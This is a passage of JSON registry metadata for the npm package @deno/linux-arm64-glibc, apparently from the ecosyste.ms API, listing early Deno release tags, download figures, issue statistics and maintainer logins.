:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-15T12:14:30.676Z","dependent_packages_count":0,"downloads":76843,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":25.354594294144324,"dependent_packages_count":36.69686831981711,"stargazers_count":0.04074647542987531,"forks_count":0.37016605755909804,"docker_downloads_count":null,"average":15.615593786737602},"purl":"pkg:npm/%40deno/linux-arm64-glibc","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@deno/linux-arm64-glibc","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@deno/linux-arm64-glibc","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@deno/linux-arm64-glibc/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-15T06:21:26.247Z","issues_count":6571,"pull_requests_count":9583,"avg_time_to_close_issue":17247523.67787189,"avg_time_to_close_pull_request":1538059.59631994,"issues_closed_count":3776,"pull_requests_closed_count":7988,"pull_request_authors_count":562,"issue_authors_count":2451,"avg_comments_per_issue":2.512707350479379,"avg_comments_per_pull_request":0.7153292288427423,"merged_pull_requests_count":6973,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":657,"past_year_pull_requests_count":1201,"past_year_avg_time_to_close_issue":1387895.1889400922,"past_year_avg_time_to_close_pull_request":1314632.8532110092,"past_year_issues_closed_count":217,"past_year_pull_requests_closed_count":654,"past_year_pull_request_authors_count":170,"past_year_issue_authors_count":367,"past_year_avg_comments_per_issue":1.2146118721461188,"past_year_avg_comments_per_pull_request":1.0591174021648626,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":22,"past_year_merged_pull_requests_count":481,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1776,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":672,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":277,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":188,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"dsherret","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":39,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"magurotuna","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Flinux-arm64-glibc/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Flinux-arm64-glibc/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Flinux-arm64-glibc/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Flinux-arm64-glibc/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Flinux-arm64-glibc/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Flinux-arm64-glibc/codemeta","maintainers":[{"uuid":"ry","login":"ry","name":null,"email":"ry@tinyclouds.org","url":null,"packages_count":44,"html_url":"https://www.npmjs.com/~ry","role":null,"created_at":"2024-12-12T21:5